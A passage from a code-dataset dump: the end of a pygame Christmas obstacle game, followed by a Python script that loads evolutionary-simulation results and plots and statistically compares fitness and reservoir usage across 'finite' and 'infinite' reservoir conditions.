screen.blit(pygame.image.load(\"assets/images/end_screen.png\"), (0,0))\n lifeLost_value = False\n #screen.blit(pygame.image.load(\"assets/images/end_screen.png\"), (0,0))\n \n if len(obstacles_in_scene[0]) > 0:\n for helicopter in obstacles_in_scene[0]:\n screen.blit(helicopter.helicopter_obstacle, (helicopter.x, helicopter.y))\n \n if len(obstacles_in_scene[1]) > 0:\n for present in obstacles_in_scene[1]:\n if present.showImage:\n screen.blit(present.present_obstacle, (present.x, present.y))\n \n if len(obstacles_in_scene[2]) > 0:\n for building in obstacles_in_scene[2]:\n screen.blit(building.building_obstacle, (building.x, building.y))\n\n pygame.display.update()\n\n\ndef showEndScreen():\n lifes_font = font.render('Lifes: 0', True, (255,255,255))\n screen.blit(lifes_font, (screen_width - 200, 20))\n screen.blit(pygame.image.load(\"assets/images/end_screen.png\"), (0,0))\n screen.blit(game_over_font, (screen_width/2-400,screen_height/2-100))\n \n pygame.display.update()\n while True:\n isQuit()\n\n\ndef game():\n global current_obstacle_frame_separation\n global obstacle_frame_separation\n global lifes_font, score_font\n #time.sleep(2)\n\n while user.lifes > 0:\n clock.tick(fps)\n lifes_font = font.render(f'Lifes: {user.lifes}', True, (255,255,255))\n score_font = font.render(f'Score: {user.score}', True, (255,255,255))\n \n if current_obstacle_frame_separation == obstacle_frame_separation:\n create_obstacles()\n current_obstacle_frame_separation = 0\n \n current_obstacle_frame_separation += 1\n move()\n move_scene()\n islifelost_var = islifeLost()\n load_window()\n hasObtainedPoints()\n \n if islifelost_var and user.lifes != 0:\n time.sleep(1)\n\n isQuit()\n \n showEndScreen()\n\n\nif __name__ == \"__main__\":\n pygame.init()\n pygame.font.init()\n font = pygame.font.SysFont(None, 50)\n font2 = pygame.font.SysFont(None, 200)\n game_over_font = font2.render('GAME OVER', True, (255,0,0))\n\n #Window adjustments\n pygame.display.set_caption(\"XMAS ADVENTURES\")\n screen = pygame.display.set_mode((screen_width, screen_height))\n\n #Set scene\n user = Character(\"anmabe\", \"melchor\")\n user.rect = pygame.Rect(user.x, user.y, user.width, user.height)\n user_character = pygame.image.load(user.character_image)\n background_image = pygame.image.load('assets/images/background.jpg')\n\n clock = pygame.time.Clock()\n\n #Background music\n #pygame.mixer.music.load('foo.mp3')\n #pygame.mixer.music.play(-1)\n\n game()","repo_name":"anmabe06/XMas-adventures","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"42968150391","text":"from copy import deepcopy\nimport os\nfrom types import TracebackType\nimport numpy as np\nfrom PIL.Image import SAVE\nfrom numpy.core.fromnumeric import std\nfrom numpy.lib.index_tricks import s_\nfrom scipy.fft import ihfft\nfrom scipy.stats.stats import trim_mean\nimport cell \nimport globalVars as globs\nimport fitness as fit\nimport evolution as ev\nimport board as brd\nimport hyperParameters as hp\nimport genome\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport seaborn as sns\nfrom matplotlib.colors import ListedColormap\nimport fitness\nimport os\nfrom scipy.stats import ttest_ind\nimport pandas as pd \nfrom math import ceil\nfrom mlxtend.evaluate import permutation_test\n\n\n\nflatui = [ \"#FFFFFF\", \"#FFFFFF\", \"#000000\", \"#FF0000\", \"#00FF00\"]\nmy_cmap = ListedColormap(sns.color_palette(flatui).as_hex())\n\n\ntotalFitness = 150\nnumberOfSimulations = 100\ngraph_y_min = 0\ngraph_y_max = 70 + 2\nnumGenerations = 7500\nminThresholdForImages = 0\n\ntop_fitness_scores_1_first = []\ntop_fitness_scores_1_final = []\ntop_fitness_scores_2_first = []\ntop_fitness_scores_2_final = []\n\nFP1 = \"oct_10_control\"\nFP2 = \"oct_10_signals\"\n# SAVE_TO = \"comparing_\" + FP1 + \"__and__\" + FP2 + \"forcing_infinite\"\nSAVE_TO = \"comparing reservoir caps\"\nstd_devs_f1 = []\nstd_devs_f2 = []\n\npixel_similarities_f1 = []\npixel_similarities_f2 = []\n\ntotal_finite_hits = []\ntotal_infinite_hits = []\n\ntarget_size_scores = []\naspect_ratio_scores = []\nred_green_scores = []\n\nmetabolic_reservoir_caps = []\nmetabolic_reservoir_caps.append([])\n\n\n\ndef updateHyperParametersF1():\n hp.onlyInfinite = False\n hp.targetAspectRatio = 5\n hp.targetSize = 400\n hp.useConsistency = False\n hp.onlyFinite = False\n hp.useReservoirsAsInputs = False\n hp.onlyUseSizeAsFitness = False\n hp.useMidpointsForAspectRatio = True\n\ndef updateHyperParametersF2():\n hp.onlyInfinite = False\n hp.targetAspectRatio = 5\n hp.targetSize = 400\n hp.useConsistency = False\n hp.onlyFinite = False\n hp.useReservoirsAsInputs = False\n hp.onlyUseSizeAsFitness = False\n hp.useMidpointsForAspectRatio = True\n\ndef convertStringKeysToIntKeys(d):\n keys = list(d.keys()) \n for k in keys:\n d[int(k)] = d[k]\n d.pop(k, None)\n return d\n\n\ndef main():\n \n genomesInfo1 = []\n genomesInfo2 = []\n\n first_gen_1 = []\n final_gen_1 = []\n first_gen_2 = []\n final_gen_2 = []\n\n\n # os.mkdir(SAVE_TO)\n # os.mkdir(SAVE_TO + \"/first_gen_pics_\" + FP1)\n # os.mkdir(SAVE_TO + \"/first_gen_pics_\" + FP2)\n # os.mkdir(SAVE_TO + \"/final_gen_pics_\" + FP1)\n # os.mkdir(SAVE_TO + \"/final_gen_pics_\" + FP2)\n # os.mkdir(SAVE_TO + \"/evolution_pics_\" + FP1)\n # os.mkdir(SAVE_TO + \"/evolution_pics_\" + FP2)\n\n updateHyperParametersF1()\n\n for s_idx in range(numberOfSimulations):\n # for s_idx in [59, 56, 96, 92]:\n # for s_idx in [20, 70, 85, 24]:\n # for s_idx in [0, 70, 6, 63]:\n # for s_idx in [95, 11, 29, 65]:\n # for s_idx in [1, 2, 3, 4, 5]:\n # for s_idx in [70]:\n FP = \"data/\" + FP1 + \"/r\" + str(s_idx) + \".json\"\n with open(FP, \"r\") as json_file:\n data = json.load(json_file)\n genomesInfo1 = data[\"genomes\"]\n\n first_gen_1.append(genomesInfo1[0][\"fitness\"])\n final_gen_1.append(genomesInfo1[-1][\"fitness\"])\n\n finiteHits = []\n infiniteHits = []\n for gen_idx, g in enumerate(genomesInfo1):\n fh = 0\n ih = 0\n for s in g[\"resHits\"]:\n fh += s[\"metFin\"]\n ih += s[\"infFin\"]\n \n try:\n total_finite_hits[gen_idx].append(fh)\n except:\n total_finite_hits.append([fh])\n\n try:\n total_infinite_hits[gen_idx].append(ih)\n except:\n total_infinite_hits.append([ih])\n\n\n try:\n target_size_scores[gen_idx].append(g[\"sizeFitness\"])\n except:\n target_size_scores.append([g[\"sizeFitness\"]])\n\n try:\n aspect_ratio_scores[gen_idx].append(g[\"aspectRatioFitness\"])\n except:\n aspect_ratio_scores.append([g[\"aspectRatioFitness\"]])\n\n try:\n red_green_scores[gen_idx].append(g[\"cellRatioFitness\"])\n except:\n red_green_scores.append([g[\"cellRatioFitness\"]])\n\n for i in range(numGenerations + 1):\n try:\n metabolic_reservoir_caps[i].append(genomesInfo1[i][\"metabolicReservoirValues\"][\"0\"])\n except:\n metabolic_reservoir_caps.append([genomesInfo1[i][\"metabolicReservoirValues\"][\"0\"]])\n\n # print(metabolic_reservoir_caps)\n \n # finiteHits.append(fh)\n # infiniteHits.append(ih)\n # ys_f = finiteHits\n # ys_i = infiniteHits\n\n \n\n g_final_1 = genome.Genome(genomesInfo1[-1][\"genome\"], \n convertStringKeysToIntKeys(genomesInfo1[-1][\"metabolicReservoirValues\"]), \n genomesInfo1[-1][\"fitness\"], \n )\n\n \n g_first_1 = genome.Genome(genomesInfo1[0][\"genome\"], \n convertStringKeysToIntKeys(genomesInfo1[0][\"metabolicReservoirValues\"]), \n genomesInfo1[0][\"fitness\"], \n )\n \n updateHyperParametersF2()\n FP = \"data/\" + FP2 + \"/r\" + str(s_idx) + \".json\"\n # print(FP)\n with open(FP, \"r\") as json_file:\n data = json.load(json_file)\n genomesInfo2 = data[\"genomes\"]\n\n first_gen_2.append(genomesInfo2[0][\"fitness\"])\n final_gen_2.append(genomesInfo2[-1][\"fitness\"])\n\n\n\n g_final_2 = genome.Genome(genomesInfo2[-1][\"genome\"], \n convertStringKeysToIntKeys(genomesInfo2[-1][\"metabolicReservoirValues\"]), \n genomesInfo2[-1][\"fitness\"], \n )\n\n g_first_2 = genome.Genome(genomesInfo2[0][\"genome\"], \n convertStringKeysToIntKeys(genomesInfo2[0][\"metabolicReservoirValues\"]), \n genomesInfo2[0][\"fitness\"], \n )\n\n # ------------------\n # GRAPHS TO GENERATE \n # ------------------\n\n # Keep tabbed \n # generate_first_generation_pictures(g_first_1, FP1, s_idx, updateHyperParametersF1)\n # generate_first_generation_pictures(g_first_2, FP2, s_idx, updateHyperParametersF2)\n # generate_final_generation_pictures(g_final_1, FP1, s_idx, updateHyperParametersF1)\n # generate_final_generation_pictures(g_final_2, FP2, s_idx, updateHyperParametersF2)\n \n # consistency_difference(g_final_1, g_final_2, FP1, FP2, updateHyperParametersF1, updateHyperParametersF2, 5, s_idx)\n # pixel_similarity_helper(g_final_1, pixel_similarities_f1, updateHyperParametersF1, 30, s_idx)\n # pixel_similarity_helper(g_final_2, pixel_similarities_f2, updateHyperParametersF2, 30, s_idx)\n\n # if s_idx in [91]:\n # generate_pic_of_each_generation_in_evolution(genomesInfo1, FP1, s_idx, updateHyperParametersF1)\n # generate_pic_of_each_generation_in_evolution(genomesInfo2, FP2, s_idx, updateHyperParametersF2)\n\n # top_fitness_scores_1_final.append([g_final_1.totalFitness, s_idx])\n # top_fitness_scores_2_final = []\n # top_fitness_scores_2_final.append([g_final_2.totalFitness, s_idx])\n # top_fitness_scores_1_first.append([g_first_1.totalFitness, s_idx])\n # top_fitness_scores_2_first.append([g_first_2.totalFitness, s_idx])\n # individual_fitness_breakdown(s_idx)\n # individual_fitness_graph(s_idx, genomesInfo1)\n\n # finite_reservoir_capacity_over_time_individual(s_idx, genomesInfo1)\n \n \n\n # print(np.mean(pixel_similarities_f1))\n # print(np.mean(pixel_similarities_f2))\n # pixel_similarity_graph()\n # print_top_agent_numbers(top_fitness_scores_1_first, top_fitness_scores_2_first, \"first\")\n # print_top_agent_numbers(top_fitness_scores_1_final, top_fitness_scores_2_final, \"final\")\n\n avg_fitness_per_generation(FP1, FP1)\n avg_fitness_per_generation(FP2, FP2)\n # gen_csv_of_first_and_final_gen_scores(first_gen_1, final_gen_1, first_gen_2, final_gen_2)\n # threshold_passing([.8], FP1, FP2)\n # t_test(FP1, FP2, final_gen_1, final_gen_2)\n # compute_permutation_test(FP1, FP2, final_gen_1, final_gen_2)\n # consistency_difference_summary()\n # pixel_vs_fitness_similarity(std_devs_f1, pixel_similarities_f1, \"infinite_and_finite\")\n # pixel_vs_fitness_similarity(std_devs_f2, pixel_similarities_f2, \"infinite only\")\n # infinite_and_finite_reservoir_usage()\n # fitness_breakdown()\n # finite_reservoir_capacity_over_time()\n print(min(final_gen_1))\n print(max(final_gen_1))\n\n print(min(final_gen_2))\n print(max(final_gen_2))\n\n\ndef finite_reservoir_capacity_over_time_individual(s_idx, genomesInfo):\n\n ys = []\n for gi in genomesInfo:\n try:\n ys.append(gi[\"metabolicReservoirValues\"][0])\n except:\n ys.append(gi[\"metabolicReservoirValues\"][\"0\"])\n # print(gi[\"metabolicReservoirValues\"][0])\n\n # ys.append(gi[\"metabolicReservoirValues\"][0])\n\n xs = list(range(numGenerations + 1))\n fig = plt.figure()\n ax = plt.axes()\n # a_list = [np.mean(x) for x in total_finite_hits]\n # b_list = [np.mean(x) for x in total_infinite_hits]\n # c = [100 * (a / (a + b)) for a, b in zip(a_list, b_list)]\n # ax.plot(xs[:1000], c[:1000])\n \n # print(ys)\n \n\n # for i in range(numGenerations + 1):\n # ys.append(gi[i][\"metabolicReservoirValues\"])\n\n ax.plot(xs, ys)\n\n ax.set(xlabel='Generation Number', ylabel=\"Finite Reservoir Cap\", title=str(s_idx))\n ax.grid(True)\n # ax.legend([\"Finite\", \"Infinite\"])\n # ax.set_ylim([0, 100])\n plt.savefig(\"individual_reservoir_caps/\" + str(s_idx) + \".png\")\n # plt.show()\n plt.clf()\n\n\ndef finite_reservoir_capacity_over_time():\n xs = list(range(numGenerations + 1))\n fig = plt.figure()\n ax = plt.axes()\n # a_list = [np.mean(x) for x in total_finite_hits]\n # b_list = [np.mean(x) for x in total_infinite_hits]\n # c = [100 * (a / (a + b)) for a, b in zip(a_list, b_list)]\n # ax.plot(xs[:1000], c[:1000])\n ys = [np.mean(arr) for arr in metabolic_reservoir_caps[:numGenerations + 1]]\n ax.plot(xs, ys)\n\n ax.set(xlabel='Generation Number', ylabel=\"Finite Reservoir Cap\", title=\"fixed finite 5\")\n ax.grid(True)\n # ax.legend([\"Finite\", \"Infinite\"])\n # ax.set_ylim([0, 100])\n # plt.savefig(SAVE_TO + \"/Avg_Fitness__\" + FP + \".png\")\n plt.show()\n plt.clf()\n\ndef individual_fitness_graph(s_idx, gi):\n xs = list(range(numGenerations + 1))\n ys = []\n for i in range(len(gi)):\n ys.append(gi[i][\"fitness\"])\n \n ax = plt.gca()\n ax.plot(xs, ys)\n ax.set(xlabel='Generation Number', ylabel='Fitness Score', title=str(s_idx))\n ax.grid(True)\n ax.set_ylim([0, 152])\n plt.savefig(\"individual_fitnesses/r\" + str(s_idx) + \".png\")\n plt.clf()\n # plt.show()\n\ndef individual_fitness_breakdown(s_idx):\n xs = list(range(numGenerations + 1))\n ys1 = []\n ys2 = []\n ys3 = []\n for k in range(len(target_size_scores)):\n ys1.append(target_size_scores[k][s_idx])\n ys2.append(aspect_ratio_scores[k][s_idx])\n ys3.append(red_green_scores[k][s_idx])\n \n ax = plt.gca()\n ax.plot(xs, ys1)\n ax.plot(xs, ys2)\n ax.plot(xs, ys3)\n ax.set(xlabel='Generation Number', ylabel='Fitness Subscore', title=\"Individual Fitness Breakdown During Evolution\")\n ax.grid(True)\n ax.set_ylim([0, 52])\n ax.legend([\"Target Size\", \"Aspect Ratio\", \"Red Green Split\"])\n plt.savefig(\"fitness_breakdowns/r\" + str(s_idx) + \".png\")\n plt.clf()\n # plt.show()\n\ndef fitness_breakdown():\n xs = list(range(numGenerations + 1))\n ys1 = []\n ys2 = []\n ys3 = []\n for k in range(len(target_size_scores)):\n ys1.append(np.mean(target_size_scores[k]))\n ys2.append(np.mean(aspect_ratio_scores[k]))\n ys3.append(np.mean(red_green_scores[k]))\n\n ax = plt.gca()\n ax.plot(xs, ys1)\n ax.plot(xs, ys2)\n ax.plot(xs, ys3)\n ax.set(xlabel='Generation Number', ylabel='Fitness Subscore', title=\"Average Fitness Breakdown During Evolution\")\n ax.grid(True)\n ax.set_ylim([0, 52])\n ax.legend([\"Target Size\", \"Aspect Ratio\", \"Red Green Split\"])\n # plt.savefig(SAVE_TO + \"/Avg_Fitness_smooshed.png\")\n # plt.clf()\n plt.show()\n\ndef infinite_and_finite_reservoir_usage():\n xs = list(range(numGenerations + 1))\n fig = plt.figure()\n ax = plt.axes()\n a_list = [np.mean(x) for x in total_finite_hits]\n b_list = [np.mean(x) for x in total_infinite_hits]\n\n p_value = permutation_test(a_list, b_list,\n method='approximate',\n num_rounds=100000,\n seed=0)\n print(\"infinite_and_finite_reservoir_usage p-value = \", p_value)\n\n c = [100 * (a / (a + b)) for a, b in zip(a_list, b_list)]\n\n x = [\"Start Of Development\"] * numberOfSimulations + [\"End Of Development\"] * numberOfSimulations\n y = c[0] + c[numGenerations]\n print(x)\n print(y)\n sns.set(style='ticks', context='talk')\n df= pd.DataFrame({'x': x, 'y': y})\n\n sns.swarmplot('x', 'y', data=df)\n sns.despine()\n \n plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n # plt.title(\"Simulations Using Only Infinite Reservoirs Take Longer to Reach \" + str(threshold) + \" Percent of Max Fitness\")\n plt.title(\"title\")\n plt.ylabel(\"Remaining Finite Fuel\")\n # plt.savefig(SAVE_TO + \"/\" + \"threshold_\" + str(threshold) + \".png\")\n plt.show()\n plt.clf()\n\n # ax.set(xlabel='Generation Number', ylabel=\"% FiniteUsage\", title=\"title\")\n # ax.grid(True)\n # # ax.legend([\"Finite\", \"Infinite\"])\n # # ax.set_ylim([0, 100])\n # # plt.savefig(SAVE_TO + \"/Avg_Fitness__\" + FP + \".png\")\n # plt.show()\n # plt.clf()\n\ndef print_top_agent_numbers(top_fitness_scores_1, top_fitness_scores_2, x):\n top_fitness_scores_1.sort()\n top_fitness_scores_2.sort()\n print(x, top_fitness_scores_1[49:52])\n print(x, top_fitness_scores_2[49:52])\n\ndef avg_fitness_per_generation(FP, graph_title):\n fitnesses = []\n\n for s_idx in range(numberOfSimulations):\n file = \"data/\" + FP + \"/r\" + str(s_idx) + \".json\"\n with open(file, \"r\") as json_file:\n data = json.load(json_file)\n genomesInfo = data[\"genomes\"]\n\n for i in range(len(genomesInfo)):\n score = genomesInfo[i][\"fitness\"]\n \n try:\n fitnesses[i].append(score)\n except:\n fitnesses.append([score])\n \n xs = list(range(numGenerations + 1))\n ys = []\n for k in range(len(fitnesses)):\n ys.append(np.mean(fitnesses[k]))\n # ys.append(max(fitnesses[k]))\n \n print(\"min: \", min(ys))\n print(\"max: \", max(ys))\n\n fig = plt.figure()\n ax = plt.axes()\n ax.plot(xs, ys[:numGenerations + 1])\n ax.set(xlabel='Generation Number', ylabel='Average of Top Fitnesses of 100 Simulations', title=graph_title)\n ax.grid(True)\n ax.set_ylim([80, 150])\n # plt.savefig(SAVE_TO + \"/Avg_Fitness__\" + FP + \".png\")\n plt.show()\n plt.clf()\n\ndef gen_csv_of_first_and_final_gen_scores(first_gen_1, final_gen_1, first_gen_2, final_gen_2):\n df = pd.DataFrame({\n FP1 + \"_first_generation\": first_gen_1,\n FP1 + \"final_generation\": final_gen_1,\n FP2 + \"first_generation\": first_gen_2,\n FP2 + \"final_generation\": final_gen_2,\n })\n\n df.to_csv(SAVE_TO + \"/csv_of_first_and_final_gen_scores.csv\", index=False)\n\ndef generate_first_generation_pictures(g, FP, s_idx, update_params):\n update_params()\n \n board = brd.Board(hp.boardWidth, hp.boardHeight)\n score = 0\n\n # while score < minThresholdForImages:\n board.reset(g)\n g.fillReservoirs()\n while (len(board.dynamicCells)):\n board.step()\n\n f = fitness.Fitness(board=board)\n f.calculate()\n score = f.totalScore\n\n data = np.array(board.grid)\n\n rows,cols = data.shape\n\n plt.imshow(data, interpolation='none', \n extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n aspect=\"equal\",\n cmap=my_cmap)\n \n plt.title(\"r\" + str(s_idx))\n fitness_breakdown_string = \"total fitness: \" + str(round(score)) + \"/ 150\\nhead vs. tail fitness: \" + str(round(f.cellRatioScore)) + \" / 50 \\naspect ratio fitness: \" + str(round(f.aspectRatioScore)) + \" / 50 \\nsize fitness: \" + str(round(f.sizeScore)) + \" / 50\" \n plt.annotate(fitness_breakdown_string, \n (20, 8), # these are the coordinates to position the label\n color='blue')\n plt.savefig(SAVE_TO + \"/first_gen_pics_\" + FP + \"/r\" + str(s_idx) + \".png\")\n plt.clf()\n\ndef generate_final_generation_pictures(g, FP, s_idx, update_params):\n update_params()\n \n board = brd.Board(hp.boardWidth, hp.boardHeight)\n score = 0\n\n # while score < minThresholdForImages:\n board.reset(g)\n g.fillReservoirs()\n while (len(board.dynamicCells)):\n board.step()\n\n f = fitness.Fitness(board=board)\n f.calculate()\n score = f.totalScore\n\n data = np.array(board.grid)\n\n rows,cols = data.shape\n\n plt.imshow(data, interpolation='none', \n extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n aspect=\"equal\",\n cmap=my_cmap)\n \n plt.title(\"r\" + str(s_idx))\n fitness_breakdown_string = \"total fitness: \" + str(round(score)) + \"/ 150\\nhead vs. tail fitness: \" + str(round(f.cellRatioScore)) + \" / 50 \\naspect ratio fitness: \" + str(round(f.aspectRatioScore)) + \" / 50 \\nsize fitness: \" + str(round(f.sizeScore)) + \" / 50\"\n # plt.annotate(fitness_breakdown_string, \n # (20, 8), # these are the coordinates to position the label\n # color='blue')\n plt.savefig(SAVE_TO + \"/final_gen_pics_\" + FP + \"/r\" + str(s_idx) + \".png\")\n plt.clf()\n\ndef generate_pic_of_each_generation_in_evolution(genomesInfo, FP, s_idx, update_params):\n update_params()\n\n os.mkdir(SAVE_TO + \"/evolution_pics_\" + FP +\"/r\" + str(s_idx))\n\n board = brd.Board(hp.boardWidth, hp.boardHeight)\n \n genomes = []\n for gi in genomesInfo:\n genomes.append( \n genome.Genome(gi[\"genome\"], \n convertStringKeysToIntKeys(gi[\"metabolicReservoirValues\"]), \n gi[\"fitness\"], \n )\n )\n\n # for i in range(0, len(genomes)):\n for i in [0, 100, 500, 2500, 5000, 7499]:\n genomeToLookAt = genomes[i]\n genomeToLookAt.fillReservoirs()\n board.reset(genomeToLookAt)\n while (len(board.dynamicCells)):\n board.step()\n\n data = np.array(board.grid)\n\n rows,cols = data.shape\n\n f = fitness.Fitness(board)\n score = f.totalScore\n\n plt.imshow(data, interpolation='none', \n extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n aspect=\"equal\",\n cmap=my_cmap)\n\n\n fitness_breakdown_string = \"total fitness: \" + str(score) + \"/ 150\\nhead vs. tail fitness: \" + str(f.cellRatioScore) + \" / 50 \\naspect ratio fitness: \" + str(f.aspectRatioScore) + \" / 50 \\nsize fitness: \" + str(f.sizeScore) + \" / 50\"\n plt.annotate(fitness_breakdown_string, \n (40, 8), # these are the coordinates to position the label\n color='blue')\n\n plt.title(\"Generation \" + str(i))\n\n plt.show()\n # plt.savefig(SAVE_TO + \"/evolution_pics_\" + FP +\"/r\" + str(s_idx) + \"/\" + str(i) + '.png')\n plt.clf()\n\ndef threshold_passing(thresholds, FP1, FP2):\n for threshold in thresholds:\n ys_a = []\n ys_b = []\n\n for s_idx in range(numberOfSimulations):\n FP = \"data/\" + FP1 + \"/r\" + str(s_idx) + \".json\"\n with open(FP, \"r\") as json_file:\n data = json.load(json_file)\n genomesInfo = data[\"genomes\"]\n \n for i, gi in enumerate(genomesInfo):\n if len(ys_a) == s_idx:\n if gi[\"fitness\"] > totalFitness * threshold:\n ys_a.append(i)\n \n \n if len(ys_a) == s_idx:\n ys_a.append(numGenerations)\n \n for s_idx in range(numberOfSimulations):\n FP = \"data/\" + FP2 + \"/r\" + str(s_idx) + \".json\"\n with open(FP, \"r\") as json_file:\n data = json.load(json_file)\n genomesInfo = data[\"genomes\"]\n \n for i, gi in enumerate(genomesInfo):\n if len(ys_b) == s_idx:\n if gi[\"fitness\"] > totalFitness * threshold:\n ys_b.append(i)\n \n \n if len(ys_b) == s_idx:\n ys_b.append(numGenerations)\n\n\n p_value = permutation_test(ys_a, ys_b,\n method='approximate',\n num_rounds=100000,\n seed=0)\n # f.write(str(p_value))\n # f.close()\n print(\"threshold compute_permutation_test, \", str(FP1), str(FP2), str(p_value))\n \n\n # x = [FP1] * numberOfSimulations + [FP2] * numberOfSimulations\n x = [\"Infinite Or Finite\"] * numberOfSimulations + [\"Infinite Only\"] * numberOfSimulations\n y = ys_a + ys_b\n sns.set(style='ticks', context='talk')\n df= pd.DataFrame({'x': x, 'y': y})\n\n sns.swarmplot('x', 'y', data=df)\n sns.despine()\n \n plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n # plt.title(\"Simulations Using Only Infinite Reservoirs Take Longer to Reach \" + str(threshold) + \" Percent of Max Fitness\")\n plt.title(\"Generations that Passed \" + str(threshold * 100) + \"%\" + \" of Max Fitness\")\n plt.ylabel(\"Generation\")\n plt.savefig(SAVE_TO + \"/\" + \"threshold_\" + str(threshold) + \".png\")\n plt.clf()\n\ndef consistency_difference(g1, g2, FP1, FP2, update_params_1, update_params_2, repeats, s_idx):\n \n # os.mkdir(\"new_repeats/inf_or_fin_\" + str(s_idx))\n # os.mkdir(\"new_repeats/inf_only_\" + str(s_idx))\n\n board = brd.Board(hp.boardWidth, hp.boardHeight)\n score = 0\n \n ys_a = []\n ys_b = []\n\n update_params_1()\n\n for i in range(repeats):\n board.reset(g1)\n g1.fillReservoirs()\n while (len(board.dynamicCells)):\n board.step()\n\n data = np.array(board.grid)\n\n rows,cols = data.shape\n\n plt.imshow(data, interpolation='none', \n extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n aspect=\"equal\",\n cmap=my_cmap)\n # plt.show()\n \n # plt.savefig(\"new_repeats/inf_or_fin_\" + str(s_idx) + \"/\" + str(i) + '.png')\n plt.clf()\n\n f = fitness.Fitness(board=board)\n f.calculate()\n score = f.totalScore\n ys_a.append(score)\n\n update_params_2()\n\n for i in range(repeats):\n board.reset(g2)\n g2.fillReservoirs()\n step = 0\n while (len(board.dynamicCells)):\n board.step()\n\n data = np.array(board.grid)\n\n rows,cols = data.shape\n\n plt.imshow(data, interpolation='none', \n extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n aspect=\"equal\",\n cmap=my_cmap)\n # plt.show()\n # plt.savefig(\"new_repeats/inf_only_\" + str(s_idx) + \"/\" + str(i) + \"_step_\" + str(step) + '.png')\n # plt.savefig(\"new_repeats/inf_only_\" + str(s_idx) + \"/\" + str(i) + '.png')\n plt.clf()\n # step += 1\n\n f = fitness.Fitness(board=board)\n f.calculate()\n score = f.totalScore\n ys_b.append(score)\n\n x = [FP1] * repeats + [FP2] * repeats\n y = ys_a + ys_b\n sns.set(style='ticks', context='talk')\n # df= pd.DataFrame({'x': x, 'y': y})\n\n # sns.swarmplot('x', 'y', data=df)\n # sns.despine()\n\n std_devs_f1.append(np.std(ys_a))\n std_devs_f2.append(np.std(ys_b))\n\n std_dev_string = FP1 + \" std dev: \" + str(np.std(ys_a)) + \"\\n\" + FP2 + \" std dev: \" + str(np.std(ys_b))\n # plt.annotate(std_dev_string, \n # (50, 50), # these are the coordinates to position the label\n # color='blue')\n \n # plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n # plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n # plt.title(\"Repeat for r\" + str(s_idx) + \"\\n\" + std_dev_string)\n\n \n # plt.ylabel(\"Fitness Score\")\n \n # plt.text(3+0.2, 4.5, \"An annotation\", horizontalalignment='left', size='medium', color='black', weight='semibold')\n # plt.savefig(SAVE_TO + \"/\" + \"repeats_r\" + str(s_idx) + \".png\")\n plt.clf()\n\n\n\ndef t_test(FP1, FP2, final_gen_1, final_gen_2):\n f = open(SAVE_TO + \"/t_test___\" + FP1 + \"___\" + FP2 + \".txt\", \"w\")\n f.write(str(ttest_ind(final_gen_1, final_gen_2)))\n f.close()\n\ndef compute_permutation_test(FP1, FP2, final_gen_1, final_gen_2):\n # f = open(SAVE_TO + \"/permutation_test___\" + FP1 + \"___\" + FP2 + \".txt\", \"w\")\n p_value = permutation_test(final_gen_1, final_gen_2,\n method='approximate',\n num_rounds=100000,\n seed=0)\n # f.write(str(p_value))\n # f.close()\n print(\"compute_permutation_test, \", str(FP1), str(FP2), str(p_value))\n\ndef consistency_difference_summary():\n plt.rcParams[\"figure.figsize\"] = [2.00, 3.50]\n # plt.rcParams[\"figure.autolayout\"] = True\n y_f = std_devs_f1\n y_l = std_devs_f2\n\n p_value = permutation_test(std_devs_f1, std_devs_f2,\n method='approximate',\n num_rounds=100000,\n seed=0)\n\n print(\"consistency difference p-value = \", p_value)\n\n x = [\"Infinite or Finite\"] * numberOfSimulations + [\"Infinite Only\"] * numberOfSimulations\n # print(x)\n y = y_f + y_l\n # print(y)\n sns.set(style='ticks', context='talk')\n df= pd.DataFrame({'x': x, 'y': y})\n\n sns.swarmplot('x', 'y', data=df)\n sns.despine()\n\n plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n plt.title(\"Finite Reservoirs Enable Consistent Growth\")\n plt.ylabel(\"Std Dev. of Fitness Over 30 Repeats\")\n # plt.savefig(SAVE_TO + \"/\" + \"consistency_summary.png\")\n plt.show()\n \n\ndef pixel_similarity_helper(g, total_scores, update_params, num_repeats, s_idx):\n boards = []\n\n update_params()\n b = brd.Board(hp.boardWidth, hp.boardHeight)\n\n for _ in range(num_repeats):\n b.reset(g)\n g.fillReservoirs()\n while (len(b.dynamicCells)):\n b.step()\n\n boards.append(deepcopy(b))\n\n spot_percentages = []\n for row in range(len(boards[0].grid)):\n for col in range(len(boards[0].grid[0])):\n white = 0\n black = 0\n green = 0\n red = 0\n for board in boards:\n cell = board.grid[row][col]\n if cell == 0:\n white += 1\n elif cell == globs.STEM:\n black += 1\n elif cell == globs.NERVE:\n green += 1\n elif cell == globs.SKIN:\n red += 1\n \n # if white == 30:\n # continue\n \n top_count = max(white, black, red, green)\n spot_percentages.append(top_count / num_repeats)\n \n # total_scores.append(np.mean(spot_percentages))\n total_scores.append(np.std(spot_percentages))\n\n \n \ndef pixel_similarity_graph():\n plt.rcParams[\"figure.figsize\"] = [2.00, 3.50]\n # plt.rcParams[\"figure.autolayout\"] = True\n y_f = pixel_similarities_f1\n y_l = pixel_similarities_f2\n\n x = [\"Infinite or Finite\"] * numberOfSimulations + [\"Infinite Only\"] * numberOfSimulations\n y = y_f + y_l\n sns.set(style='ticks', context='talk')\n df= pd.DataFrame({'x': x, 'y': y})\n\n sns.swarmplot('x', 'y', data=df)\n sns.despine()\n\n plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n 